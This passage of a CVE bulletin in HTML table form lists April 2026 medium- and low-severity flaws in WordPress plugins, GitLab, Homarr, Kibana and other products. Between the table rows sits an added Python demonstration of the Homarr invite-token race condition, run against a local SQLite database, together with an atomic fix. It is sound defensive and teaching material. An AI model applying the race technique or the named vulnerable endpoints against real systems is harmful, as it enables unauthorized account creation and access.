    <td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34757" target=3D= "_blank" rel=3D"noopener">CVE-2026-34757</a></td>
    <td>
    <a href=3D"https://github.com/pnggroup/libpng/security/advisories/GHSA-6fr7= -g8h7-v645" target=3D"_blank" rel=3D"noopener">https://github.com/pnggroup/= libpng/security/advisories/GHSA-6fr7-g8h7-v645</a><br><a href=3D"https://gi= thub.com/pnggroup/libpng/issues/836" target=3D"_blank" rel=3D"noopener">htt= ps://github.com/pnggroup/libpng/issues/836</a><br><a href=3D"https://github= .com/pnggroup/libpng/issues/837" target=3D"_blank" rel=3D"noopener">https:/= /github.com/pnggroup/libpng/issues/837</a><br><a href=3D"https://github.com= /pnggroup/libpng/commit/398cbe3df03f4e11bb031e07f416dfdde3684e8a" target=3D= "_blank" rel=3D"noopener">https://github.com/pnggroup/libpng/commit/398cbe3= df03f4e11bb031e07f416dfdde3684e8a</a><br><a href=3D"https://github.com/pngg= roup/libpng/commit/55d20aaa322c9274491cda82c5cd4f99b48c6bcc" target=3D"_bla= nk" rel=3D"noopener">https://github.com/pnggroup/libpng/commit/55d20aaa322c= 9274491cda82c5cd4f99b48c6bcc</a><br>=C2=A0</td>
    </tr>
    <tr>
    <td class=3D"vendor-product">projectzealous01--PZ Frontend Manager</td>
    <td>The PZ Frontend Manager plugin for WordPress is vulnerable to Missing A= uthorization in all versions up to and including 1.0.6. The pzfm_user_reque= st_action_callback() function, registered via the wp_ajax_pzfm_user_request= _action action hook, lacks both capability checks and nonce verification. T= his function handles user activation, deactivation, and deletion operations=
    . When the 'dataType' parameter is set to 'delete', the function calls wp_d= elete_user() on all provided user IDs without verifying that the current us=
    er has the appropriate permissions. Notably, the similar pzfm_remove_item_c= allback() function does check pzfm_can_delete_user() before performing dele= tions, indicating this was an oversight. This makes it possible for authent= icated attackers, with Subscriber-level access and above, to delete arbitra=
    ry WordPress users (including administrators) by sending a crafted request =
    to the AJAX endpoint.</td>
    <td>2026-04-08</td>
    <td>5.3</td>
    <td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-3477" target=3D"= _blank" rel=3D"noopener">CVE-2026-3477</a></td>
    <td>
    <a href=3D"https://www.wordfence.com/threat-intel/vulnerabilities/id/90d8e3= 45-b549-493b-a84b-abe56ab42a04?source=3Dcve" target=3D"_blank" rel=3D"noope= ner">https://www.wordfence.com/threat-intel/vulnerabilities/id/90d8e345-b54= 9-493b-a84b-abe56ab42a04?source=3Dcve</a><br><a href=3D"https://plugins.tra= c.wordpress.org/browser/pz-frontend-manager/trunk/admin/includes/ajax-hooks= .php#L331" target=3D"_blank" rel=3D"noopener">https://plugins.trac.wordpres= s.org/browser/pz-frontend-manager/trunk/admin/includes/ajax-hooks.php#L331<= /a><br><a href=3D"https://plugins.trac.wordpress.org/browser/pz-frontend-ma= nager/tags/1.0.6/admin/includes/ajax-hooks.php#L331" target=3D"_blank" rel= =3D"noopener">https://plugins.trac.wordpress.org/browser/pz-frontend-manage= r/tags/1.0.6/admin/includes/ajax-hooks.php#L331</a><br><a href=3D"https://p= lugins.trac.wordpress.org/browser/pz-frontend-manager/trunk/admin/includes/= ajax-hooks.php#L292" target=3D"_blank" rel=3D"noopener">https://plugins.tra= c.wordpress.org/browser/pz-frontend-manager/trunk/admin/includes/ajax-hooks= .php#L292</a><br><a href=3D"https://plugins.trac.wordpress.org/browser/pz-f= rontend-manager/tags/1.0.6/admin/includes/ajax-hooks.php#L292" target=3D"_b= lank" rel=3D"noopener">https://plugins.trac.wordpress.org/browser/pz-fronte= nd-manager/tags/1.0.6/admin/includes/ajax-hooks.php#L292</a><br><a href=3D"= https://plugins.trac.wordpress.org/browser/pz-frontend-manager/trunk/admin/= includes/ajax-hooks.php#L290" target=3D"_blank" rel=3D"noopener">https://pl= ugins.trac.wordpress.org/browser/pz-frontend-manager/trunk/admin/includes/a= jax-hooks.php#L290</a><br><a href=3D"https://plugins.trac.wordpress.org/bro= wser/pz-frontend-manager/tags/1.0.6/admin/includes/ajax-hooks.php#L290" tar= get=3D"_blank" rel=3D"noopener">https://plugins.trac.wordpress.org/browser/= pz-frontend-manager/tags/1.0.6/admin/includes/ajax-hooks.php#L290</a><br>= =C2=A0</td>
    </tr>
    <tr>
    <td class=3D"vendor-product">Eniture technology--LTL Freight Quotes Worldwi=
    de Express Edition</td>
    <td>Missing Authorization vulnerability in Eniture technology LTL Freight Q= uotes - Worldwide Express Edition allows Exploiting Incorrectly Configured = Access Control Security Levels. This issue affects LTL Freight Quotes - Worl= dwide Express Edition: from n/a through 5.2.1.</td>
    <td>2026-04-07</td>
    <td>5.3</td>
    <td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34899" target=3D= "_blank" rel=3D"noopener">CVE-2026-34899</a></td>
    <td>
    <a href=3D"https://patchstack.com/database/wordpress/plugin/ltl-freight-quo= tes-worldwide-express-edition/vulnerability/wordpress-ltl-freight-quotes-wo= rldwide-express-edition-plugin-5-2-1-broken-access-control-vulnerability?_s= _id=3Dcve" target=3D"_blank" rel=3D"noopener">https://patchstack.com/databa= se/wordpress/plugin/ltl-freight-quotes-worldwide-express-edition/vulnerabil= ity/wordpress-ltl-freight-quotes-worldwide-express-edition-plugin-5-2-1-bro= ken-access-control-vulnerability?_s_id=3Dcve</a><br>=C2=A0</td>
    </tr>
    <tr>
    <td class=3D"vendor-product">OceanWP--Ocean Extra</td>
    <td>Missing Authorization vulnerability in OceanWP Ocean Extra allows Explo= iting Incorrectly Configured Access Control Security Levels. This issue affe= cts Ocean Extra: from n/a through 2.5.3.</td>
    <td>2026-04-07</td>
    <td>5.4</td>
    <td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34903" target=3D= "_blank" rel=3D"noopener">CVE-2026-34903</a></td>
    <td>
    <a href=3D"https://patchstack.com/database/wordpress/plugin/ocean-extra/vul= nerability/wordpress-ocean-extra-plugin-2-5-3-broken-access-control-vulnera= bility?_s_id=3Dcve" target=3D"_blank" rel=3D"noopener">https://patchstack.c= om/database/wordpress/plugin/ocean-extra/vulnerability/wordpress-ocean-extr= a-plugin-2-5-3-broken-access-control-vulnerability?_s_id=3Dcve</a><br>=C2= =A0</td>
    </tr>
    <tr>
    <td class=3D"vendor-product">Heatmiser--Heatmiser Wifi Thermostat</td> <td>Heatmiser Wifi Thermostat 1.7 contains a cross-site request forgery vul= nerability that allows attackers to change administrator credentials by tri= cking authenticated users into submitting malicious requests. Attackers can=
    craft HTML forms targeting the networkSetup.htm endpoint with parameters u= snm, usps, and cfps to modify the admin username and password without user = consent.</td>
    <td>2026-04-12</td>
    <td>4.3</td>
    <td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2019-25708" target=3D= "_blank" rel=3D"noopener">CVE-2019-25708</a></td>
    <td>
    <a href=3D"https://www.exploit-db.com/exploits/46100" target=3D"_blank" rel= =3D"noopener">ExploitDB-46100</a><br><a href=3D"https://www.vulncheck.com/a= dvisories/heatmiser-wifi-thermostat-cross-site-request-forgery" target=3D"_= blank" rel=3D"noopener">VulnCheck Advisory: Heatmiser Wifi Thermostat 1.7 C= ross-Site Request Forgery</a><br>=C2=A0</td>
    </tr>
    <tr>
    <td class=3D"vendor-product">GitLab--GitLab</td>
    <td>GitLab has remediated an issue in GitLab EE affecting all versions from=
    16.6 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that unde=
    r certain circumstances could have allowed an authenticated user to have ac= cess to other users' email addresses via certain GraphQL queries.</td> <td>2026-04-08</td>
    <td>4.3</td>
    <td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-9484" target=3D"= _blank" rel=3D"noopener">CVE-2025-9484</a></td>
    <td>
    <a href=3D"https://gitlab.com/gitlab-org/gitlab/-/issues/565363" target=3D"= _blank" rel=3D"noopener">GitLab Issue #565363</a><br><a href=3D"https://hac= kerone.com/reports/3303810" target=3D"_blank" rel=3D"noopener">HackerOne Bu=
    g Bounty Report #3303810</a><br><a href=3D"https://about.gitlab.com/release= s/2026/04/08/patch-release-gitlab-18-10-3-released/" target=3D"_blank" rel= =3D"noopener">https://about.gitlab.com/releases/2026/04/08/patch-release-gi= tlab-18-10-3-released/</a><br>=C2=A0</td>
    </tr>
    <tr>
    <td class=3D"vendor-product">vsourz1td--Advanced Contact form 7 DB</td>
    <td>The Advanced Contact form 7 DB plugin for WordPress is vulnerable to un= authorized access of data due to a missing capability check on the 'vsz_cf7= _export_to_excel' function in all versions up to, and including, 2.0.9. Thi=
    s makes it possible for authenticated attackers, with Subscriber-level acce=
    ss and above, to export form submissions to excel file.</td> <td>2026-04-08</td>
    <td>4.3</td>
    <td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-0814" target=3D"= _blank" rel=3D"noopener">CVE-2026-0814</a></td>
    <td>
    <a href=3D"https://www.wordfence.com/threat-intel/vulnerabilities/id/5e3de1= a4-a534-475b-9138-2337755b0288?source=3Dcve" target=3D"_blank" rel=3D"noope= ner">https://www.wordfence.com/threat-intel/vulnerabilities/id/5e3de1a4-a53= 4-475b-9138-2337755b0288?source=3Dcve</a><br><a href=3D"https://plugins.tra= c.wordpress.org/browser/advanced-cf7-db/tags/2.0.9/admin/class-advanced-cf7= -db-admin.php#L1507" target=3D"_blank" rel=3D"noopener">https://plugins.tra= c.wordpress.org/browser/advanced-cf7-db/tags/2.0.9/admin/class-advanced-cf7= -db-admin.php#L1507</a><br><a href=3D"https://plugins.trac.wordpress.org/ch= angeset/3497481/advanced-cf7-db" target=3D"_blank" rel=3D"noopener">https:/= /plugins.trac.wordpress.org/changeset/3497481/advanced-cf7-db</a><br>=C2=A0= </td>
    </tr>
    <tr>
    <td class=3D"vendor-product">realmag777--BEAR Bulk Editor and Products Mana= ger Professional for WooCommerce by Pluginus.Net</td>
    <td>The BEAR - Bulk Editor and Products Manager Professional for WooCommerc=
    e by Pluginus.Net plugin for WordPress is vulnerable to Cross-Site Request = Forgery in all versions up to, and including, 1.1.5. This is due to missing=
    nonce validation on the woobe_delete_tax_term() function. This makes it po= ssible for unauthenticated attackers to delete WooCommerce taxonomy terms (= categories, tags, etc.) via a forged request granted they can trick a site = administrator or shop manager into performing an action such as clicking on=
    a link.</td>
    <td>2026-04-08</td>
    <td>4.3</td>
    <td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-1673" target=3D"= _blank" rel=3D"noopener">CVE-2026-1673</a></td>
    <td>
    <a href=3D"https://www.wordfence.com/threat-intel/vulnerabilities/id/1e4e89= 60-b0c1-4dbb-ba97-e45b88fb06c0?source=3Dcve" target=3D"_blank" rel=3D"noope= ner">https://www.wordfence.com/threat-intel/vulnerabilities/id/1e4e8960-b0c= 1-4dbb-ba97-e45b88fb06c0?source=3Dcve</a><br><a href=3D"https://plugins.tra= c.wordpress.org/browser/woo-bulk-editor/trunk/index.php#L1474" target=3D"_b= lank" rel=3D"noopener">https://plugins.trac.wordpress.org/browser/woo-bulk-= editor/trunk/index.php#L1474</a><br><a href=3D"https://plugins.trac.wordpre= ss.org/changeset/3457263/" target=3D"_blank" rel=3D"noopener">https://plugi= ns.trac.wordpress.org/changeset/3457263/</a><br><a href=3D"https://plugins.= trac.wordpress.org/changeset/3465138/" target=3D"_blank" rel=3D"noopener">h= ttps://plugins.trac.wordpress.org/changeset/3465138/</a><br>=C2=A0</td>
    </tr>
    <tr>
    <td class=3D"vendor-product">GitLab--GitLab</td>
    <td>GitLab has remediated an issue in GitLab EE affecting all versions from=
    11.3 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that coul=
    d have allowed an authenticated user with developer-role permissions to mod= ify protected environment settings due to improper authorization checks in = the API.</td>
    <td>2026-04-08</td>
    <td>4.3</td>
    <td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-1752" target=3D"= _blank" rel=3D"noopener">CVE-2026-1752</a></td>
    <td>
    <a href=3D"https://hackerone.com/reports/3533545" target=3D"_blank" rel=3D"= noopener">HackerOne Bug Bounty Report #3533545</a><br><a href=3D"https://gi= tlab.com/gitlab-org/gitlab/-/work_items/588413" target=3D"_blank" rel=3D"no= opener">https://gitlab.com/gitlab-org/gitlab/-/work_items/588413</a><br><a = href=3D"https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-1= 8-10-3-released/" target=3D"_blank" rel=3D"noopener">https://about.gitlab.c= om/releases/2026/04/08/patch-release-gitlab-18-10-3-released/</a><br>=C2=A0= </td>
    </tr>
    <tr>
    <td class=3D"vendor-product">arubadev--Aruba HiSpeed Cache</td>
    <td>The Aruba HiSpeed Cache plugin for WordPress is vulnerable to Cross-Sit=
    e Request Forgery in all versions up to, and including, 3.0.4. This is due =
    to missing nonce verification on the `ahsc_ajax_reset_options()` function. = This makes it possible for unauthenticated attackers to reset all plugin se= ttings to their default values via a forged request granted they can trick =
    a site administrator into performing an action such as clicking on a link.</td>
    <td>2026-04-10</td>
    <td>4.3</td>
    <td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-1924" target=3D"= _blank" rel=3D"noopener">CVE-2026-1924</a></td>
    <td>
    <a href=3D"https://www.wordfence.com/threat-intel/vulnerabilities/id/d22301= 51-fde2-43d6-8bff-0d2ffd559ab3?source=3Dcve" target=3D"_blank" rel=3D"noope= ner">https://www.wordfence.com/threat-intel/vulnerabilities/id/d2230151-fde= 2-43d6-8bff-0d2ffd559ab3?source=3Dcve</a><br><a href=3D"https://plugins.tra= c.wordpress.org/browser/aruba-hispeed-cache/tags/3.0.4/aruba-hispeed-cache.= php#L632" target=3D"_blank" rel=3D"noopener">https://plugins.trac.wordpress= .org/browser/aruba-hispeed-cache/tags/3.0.4/aruba-hispeed-cache.php#L632</a= ><br><a href=3D"https://plugins.trac.wordpress.org/browser/aruba-hispeed-ca= che/tags/3.0.4/aruba-hispeed-cache.php#L631" target=3D"_blank" rel=3D"noope= ner">https://plugins.trac.wordpress.org/browser/aruba-hispeed-cache/tags/3.= 0.4/aruba-hispeed-cache.php#L631</a><br><a href=3D"https://plugins.trac.wor= dpress.org/changeset?old_path=3D%2Faruba-hispeed-cache/tags/3.0.4&new_path= =3D%2Faruba-hispeed-cache/tags/3.0.5" target=3D"_blank" rel=3D"noopener">ht= tps://plugins.trac.wordpress.org/changeset?old_path=3D%2Faruba-hispeed-cach= e/tags/3.0.4&new_path=3D%2Faruba-hispeed-cache/tags/3.0.5</a><br>=C2=A0</td=
    >
    </tr>
    <tr>
    <td class=3D"vendor-product">GitLab--GitLab</td>
    <td>GitLab has remediated an issue in GitLab CE/EE affecting all versions f= rom 18.2 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that c= ould have allowed an authenticated user to access confidential issues assig= ned to other users via CSV export due to insufficient authorization checks.= </td>
    <td>2026-04-08</td>
    <td>4.3</td>
    <td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-2104" target=3D"= _blank" rel=3D"noopener">CVE-2026-2104</a></td>
    <td>
    <a href=3D"https://hackerone.com/reports/3541476" target=3D"_blank" rel=3D"= noopener">HackerOne Bug Bounty Report #3541476</a><br><a href=3D"https://gi= tlab.com/gitlab-org/gitlab/-/work_items/589021" target=3D"_blank" rel=3D"no= opener">https://gitlab.com/gitlab-org/gitlab/-/work_items/589021</a><br><a = href=3D"https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-1= 8-10-3-released/" target=3D"_blank" rel=3D"noopener">https://about.gitlab.c= om/releases/2026/04/08/patch-release-gitlab-18-10-3-released/</a><br>=C2=A0= </td>
    </tr>
    <tr>
    <td class=3D"vendor-product">idealwebdesignlk--Whole Enquiry Cart for WooCo= mmerce</td>
    <td>The Whole Enquiry Cart for WooCommerce plugin for WordPress is vulnerab=
    le to Stored Cross-Site Scripting via the 'woowhole_success_msg' parameter =
    in all versions up to, and including, 1.2.1 due to insufficient input sanit= ization and output escaping. This makes it possible for authenticated attac= kers, with administrator-level access, to inject arbitrary web scripts in p= ages that will execute whenever a user accesses an injected page. This only=
    affects multi-site installations and installations where unfiltered_html h=
    as been disabled.</td>
    <td>2026-04-08</td>
    <td>4.4</td>
    <td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-2838" target=3D"= _blank" rel=3D"noopener">CVE-2026-2838</a></td>
    <td>
    <a href=3D"https://www.wordfence.com/threat-intel/vulnerabilities/id/ddc14a= 98-1df8-480b-bae3-5ec057b498af?source=3Dcve" target=3D"_blank" rel=3D"noope= ner">https://www.wordfence.com/threat-intel/vulnerabilities/id/ddc14a98-1df= 8-480b-bae3-5ec057b498af?source=3Dcve</a><br><a href=3D"https://plugins.tra= c.wordpress.org/browser/whole-cart-enquiry/trunk/admin.php#L53" target=3D"_= blank" rel=3D"noopener">https://plugins.trac.wordpress.org/browser/whole-ca= rt-enquiry/trunk/admin.php#L53</a><br>=C2=A0</td>
    </tr>
    <tr>
    <td class=3D"vendor-product">homarr-labs--homarr</td>
    <td>Homarr is an open-source dashboard. Prior to 1.57.0, the user registrat= ion endpoint (/api/trpc/user.register) is vulnerable to a race condition th=
    at allows an attacker to create multiple user accounts from a single-use in= vite token. The registration flow performs three sequential database operat= ions without a transaction: CHECK, CREATE, and DELETE. Because these operat= ions are not atomic, concurrent requests can all pass the validation step (=
    1) before any of them reaches the deletion step (3). This allows multiple a= ccounts to be registered using a single invite token that was intended to b=
    e single-use. This vulnerability is fixed in 1.57.0.</td>
    <td>2026-04-06</td>
    <td>4.2</td>
    <td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-32602" target=3D= "_blank" rel=3D"noopener">CVE-2026-32602</a></td>
    <td>
    <a href=3D"https://github.com/homarr-labs/homarr/security/advisories/GHSA-v= fw3-53q9-2hp8" target=3D"_blank" rel=3D"noopener">https://github.com/homarr= -labs/homarr/security/advisories/GHSA-vfw3-53q9-2hp8</a><br>=C2=A0</td>
    </tr>
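<p>The Homarr entry above is the classic check-then-act race: CHECK that the token is unused, CREATE the account, DELETE the token, each as its own statement, so every request that passes step 1 before the first one reaches step 3 gets an account. The block below is an added example, not Homarr's code, that reproduces that interleaving deterministically and shows the repair. A threading.Barrier stands in for real request concurrency by holding every worker after step 1; the fixed variant claims the token with a single conditional UPDATE, and because the database serialises that write only one caller sees rowcount 1. Table and column names, the token string and the worker count are assumptions for the demonstration; SQLite is used because it ships with Python, and the same statement works unchanged on PostgreSQL or MySQL.</p>

```python
"""Added example (not homarr code): the CHECK/CREATE/DELETE race behind
CVE-2026-32602, made deterministic, beside the one-statement claim that
closes it."""
import os
import sqlite3
import tempfile
import threading
from typing import Callable, Optional

TOKEN = "single-use-invite"   # constructed sample token
N_WORKERS = 8


def make_db() -> str:
    """Fresh database holding one unused invite; returns the file path."""
    fd, path = tempfile.mkstemp(suffix=".sqlite")
    os.close(fd)
    con = sqlite3.connect(path)
    con.executescript(
        "CREATE TABLE invite (token TEXT PRIMARY KEY, used_at TEXT);"
        "CREATE TABLE account (id INTEGER PRIMARY KEY, name TEXT NOT NULL);"
    )
    con.execute("INSERT INTO invite (token, used_at) VALUES (?, NULL)", (TOKEN,))
    con.commit()
    con.close()
    return path


def connect(path: str) -> sqlite3.Connection:
    # isolation_level=None puts the connection in autocommit: each statement is
    # its own transaction, which is exactly the situation the advisory describes.
    return sqlite3.connect(path, timeout=30, isolation_level=None)


def register_racy(path: str, token: str, name: str,
                  sync: Optional[threading.Barrier] = None) -> bool:
    """Vulnerable shape: (1) CHECK token unused, (2) CREATE account, (3) DELETE token."""
    con = connect(path)
    try:
        row = con.execute("SELECT 1 FROM invite WHERE token = ? AND used_at IS NULL", (token,)).fetchone()
        if row is None:
            return False                                   # (1) fails: token already gone
        if sync is not None:
            sync.wait()                                    # demo aid: everyone has passed (1) by now
        con.execute("INSERT INTO account (name) VALUES (?)", (name,))  # (2)
        con.execute("DELETE FROM invite WHERE token = ?", (token,))    # (3) affects 0 rows for latecomers, no error
        return True
    finally:
        con.close()


def register_atomic(path: str, token: str, name: str,
                    sync: Optional[threading.Barrier] = None) -> bool:
    """Fixed shape: test-and-claim the token in ONE statement; create the account only if we won."""
    con = connect(path)
    try:
        if sync is not None:
            sync.wait()                                    # demo aid: maximise contention on the UPDATE
        claimed = con.execute(
            "UPDATE invite SET used_at = datetime('now') WHERE token = ? AND used_at IS NULL",
            (token,),
        ).rowcount
        if claimed != 1:
            return False                                   # another request consumed it first
        con.execute("INSERT INTO account (name) VALUES (?)", (name,))
        return True
    finally:
        con.close()


def run_race(register: Callable[..., bool], n: int = N_WORKERS) -> int:
    """Fire n concurrent registrations with the same token; return accounts created."""
    path = make_db()
    barrier = threading.Barrier(n)
    threads = [threading.Thread(target=register, args=(path, TOKEN, f"user-{i}", barrier))
               for i in range(n)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    con = connect(path)
    try:
        return con.execute("SELECT COUNT(*) FROM account").fetchone()[0]
    finally:
        con.close()
        os.remove(path)


if __name__ == "__main__":
    print("racy   :", run_race(register_racy), "accounts minted from one invite")
    print("atomic :", run_race(register_atomic), "account minted from one invite")
```

<p>The conditional UPDATE works because its WHERE clause and its write are one operation from the database's point of view; the equivalent fix with an explicit transaction is to run the check and the delete inside <code>BEGIN IMMEDIATE</code> (SQLite) or a <code>SELECT ... FOR UPDATE</code> (PostgreSQL/MySQL) so the second request blocks until the first has consumed the token. If account creation can fail after the claim, put the claim and the insert in the same transaction so a failed registration does not burn the invite.</p>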
    <tr>
    <td class=3D"vendor-product">chamilo--chamilo-lms</td>
    <td>Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0= -RC.3, an Open Redirect vulnerability in the session course edit page allow=
    s an attacker to redirect an authenticated administrator to an arbitrary ex= ternal URL after saving coach assignment changes. The redirect also leaks t=
    he id_session parameter to the attacker's server. This vulnerability is fix=
    ed in 1.11.38 and 2.0.0-RC.3.</td>
    <td>2026-04-10</td>
    <td>4.7</td>
    <td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-32932" target=3D= "_blank" rel=3D"noopener">CVE-2026-32932</a></td>
    <td>
    <a href=3D"https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-= q2cp-3qj3-wx8q" target=3D"_blank" rel=3D"noopener">https://github.com/chami= lo/chamilo-lms/security/advisories/GHSA-q2cp-3qj3-wx8q</a><br><a href=3D"ht= tps://github.com/chamilo/chamilo-lms/commit/b005b3d3e76cf6eafc03e15ac445cef= f089551c0" target=3D"_blank" rel=3D"noopener">https://github.com/chamilo/ch= amilo-lms/commit/b005b3d3e76cf6eafc03e15ac445ceff089551c0</a><br><a href=3D= "https://github.com/chamilo/chamilo-lms/commit/fbd8d7eb37d05ec974293f05b6ff= aaf9102ebd2b" target=3D"_blank" rel=3D"noopener">https://github.com/chamilo= /chamilo-lms/commit/fbd8d7eb37d05ec974293f05b6ffaaf9102ebd2b</a><br>=C2=A0<=
    /td>
    </tr>
    <tr>
    <td class=3D"vendor-product">Microsoft--Microsoft Edge (Chromium-based)</td>
    <td>Microsoft Edge (Chromium-based) Spoofing Vulnerability</td> <td>2026-04-10</td>
    <td>4.3</td>
    <td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33118" target=3D= "_blank" rel=3D"noopener">CVE-2026-33118</a></td>
    <td>
    <a href=3D"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-3= 3118" target=3D"_blank" rel=3D"noopener">Microsoft Edge (Chromium-based) Sp= oofing Vulnerability</a><br>=C2=A0</td>
    </tr>
    <tr>
    <td class=3D"vendor-product">Elastic--Kibana</td>
    <td>Incorrect Authorization (CWE-863) in Kibana can lead to cross-space inf= ormation disclosure via Privilege Abuse (CAPEC-122). A user with Fleet agen=
    t management privileges in one Kibana space can retrieve Fleet Server polic=
    y details from other spaces through an internal enrollment endpoint. The en= dpoint bypasses space-scoped access controls by using an unscoped internal = client, returning operational identifiers, policy names, management state, = and infrastructure linkage details from spaces the user is not authorized t=
    o access.</td>
    <td>2026-04-08</td>
    <td>4.3</td>
    <td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33460" target=3D= "_blank" rel=3D"noopener">CVE-2026-33460</a></td>
    <td>
    <a href=3D"https://discuss.elastic.co/t/kibana-8-19-14-9-2-8-9-3-3-security= -update-esa-2026-25/385813" target=3D"_blank" rel=3D"noopener">https://disc= uss.elastic.co/t/kibana-8-19-14-9-2-8-9-3-3-security-update-esa-2026-25/385= 813</a><br>=C2=A0</td>
    </tr>
    <tr>
    <td class=3D"vendor-product">themeum--Tutor LMS eLearning and online course=
    solution</td>
    <td>The Tutor LMS - eLearning and online course solution plugin for WordPre=
    ss is vulnerable to Insecure Direct Object Reference in all versions up to,=
    and including, 3.9.7. This is due to missing authorization checks in the `= save_course_content_order()` private method, which is called unconditionall=
    y by the `tutor_update_course_content_order` AJAX handler. While the handle= r's `content_parent` branch includes a `can_user_manage()` check, the `save= _course_content_order()` call processes attacker-supplied `tutor_topics_les= sons_sorting` JSON without any ownership or capability verification. This m= akes it possible for authenticated attackers with Subscriber-level access o=
    r above to detach lessons from topics, reorder course content, and reassign=
    lessons between topics in any course, including admin-owned courses, by se= nding a crafted AJAX request with manipulated topic and lesson IDs.</td> <td>2026-04-11</td>
    <td>4.3</td>
    <td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-3371" target=3D"= _blank" rel=3D"noopener">CVE-2026-3371</a></td>
    <td>
    <a href=3D"https://www.wordfence.com/threat-intel/vulnerabilities/id/f9cf04= 30-8577-449a-aefe-d7bf606fe2de?source=3Dcve" target=3D"_blank" rel=3D"noope= ner">https://www.wordfence.com/threat-intel/vulnerabilities/id/f9cf0430-857= 7-449a-aefe-d7bf606fe2de?source=3Dcve</a><br><a href=3D"https://plugins.tra= c.wordpress.org/browser/tutor/trunk/classes/Course.php#L1687" target=3D"_bl= ank" rel=3D"noopener">https://plugins.trac.wordpress.org/browser/tutor/trun= k/classes/Course.php#L1687</a><br><a href=3D"https://plugins.trac.wordpress= .org/browser/tutor/trunk/classes/Course.php#L1755" target=3D"_blank" rel=3D= "noopener">https://plugins.trac.wordpress.org/browser/tutor/trunk/classes/C= ourse.php#L1755</a><br><a href=3D"https://plugins.trac.wordpress.org/browse= r/tutor/trunk/classes/Course.php#L252" target=3D"_blank" rel=3D"noopener">h= ttps://plugins.trac.wordpress.org/browser/tutor/trunk/classes/Course.php#L2= 52</a><br><a href=3D"https://plugins.trac.wordpress.org/changeset?old_path= =3D%2Ftutor/tags/3.9.7&new_path=3D%2Ftutor/tags/3.9.8" target=3D"_blank" re= l=3D"noopener">https://plugins.trac.wordpress.org/changeset?old_path=3D%2Ft= utor/tags/3.9.7&new_path=3D%2Ftutor/tags/3.9.8</a><br>=C2=A0</td>
    </tr>
    </tbody>
    </table>
    <p><a href=3D"#top">Back to top</a></p>
    </div>
    <div id=3D"low_v">
    <h2 id=3D"low_v_title">Low Vulnerabilities</h2>
    <table class=3D"table no-tablesaw" style=3D"table-layout: fixed; width: 100= %;" border=3D"1" summary=3D"Low Vulnerabilities" align=3D"center">
    <thead>
    <tr>
    <th class=3D"vendor-product" style=3D"width: 24%;" scope=3D"col">
    <span class=3D"primary-vendor">Primary</span><br><span class=3D"primary-ven= dor">Vendor</span> -- Product</th>
    <th style=3D"width: 44%;" scope=3D"col">Description</th>
    <th style=3D"width: 10%;" scope=3D"col">Published</th>
    <th style=3D"width: 8%;" scope=3D"col">CVSS Score</th>
    <th style=3D"width: 7%;" scope=3D"col">Source Info</th>
    <th style=3D"width: 7%;" scope=3D"col">Patch Info</th>
    </tr>
    </thead>
    <tbody>
    <tr>
    <td class=3D"vendor-product">Mattermost--Mattermost</td>
    <td>Mattermost Plugins versions &lt;=3D2.3.1 fail to limit the request body=
    size on the /lifecycle webhook endpoint which allows an authenticated = attacker to cause memory exhaustion and denial of service via sending an ov= ersized JSON payload. Mattermost Advisory ID: MMSA-2026-00610</td>
    <td>2026-04-09</td>
    <td>3.7</td>
    <td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-21388" target=3D= "_blank" rel=3D"noopener">CVE-2026-21388</a></td>
    <td>
    <a href=3D"https://mattermost.com/security-updates" target=3D"_blank" rel= =3D"noopener">MMSA-2026-00610</a><br>=C2=A0</td>
    </tr>
    <tr>
    <td class=3D"vendor-product">Dell--PowerProtect Agent</td>
    <td>Dell PowerProtect Agent Service, version(s) prior to 20.1, contain(s) a=
    n Incorrect Permission Assignment for Critical Resource vulnerability. A lo=
    w privileged attacker with local access could potentially exploit this vuln= erability, leading to Information exposure.</td>
    <td>2026-04-08</td>
    <td>3.3</td>
    <td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-28264" target=3D= "_blank" rel=3D"noopener">CVE-2026-28264</a></td>
    <td>
    <a href=3D"https://www.dell.com/support/kbdoc/en-us/000447277/dsa-2026-158-= security-update-dell-powerprotect-data-manager-for-multiple-security-vulner= abilities" target=3D"_blank" rel=3D"noopener">https://www.dell.com/support/= kbdoc/en-us/000447277/dsa-2026-158-security-update-dell-powerprotect-data-m= anager-for-multiple-security-vulnerabilities</a><br>=C2=A0</td>
    </tr>
    <tr>
    <td class=3D"vendor-product">pi-hole--web</td>
    <td>Pi-hole Admin Interface is a web interface for managing Pi-hole, a netw= ork-level ad and internet tracker blocking application. From 6.0 to before = 6.5, client hostnames and IP addresses from the FTL database are rendered i= nto the DOM without escaping in network.js (Network page) and charts.js/ind= ex.js (Dashboard chart tooltips). While upstream validation in dnsmasq and = FTL blocks HTML characters via normal DHCP/DNS paths, the web UI performs n=
    o output escaping - an inconsistency with other fields in the same file tha=
    t are properly escaped. This vulnerability is fixed in 6.5.</td> <td>2026-04-06</td>
    <td>3.4</td>
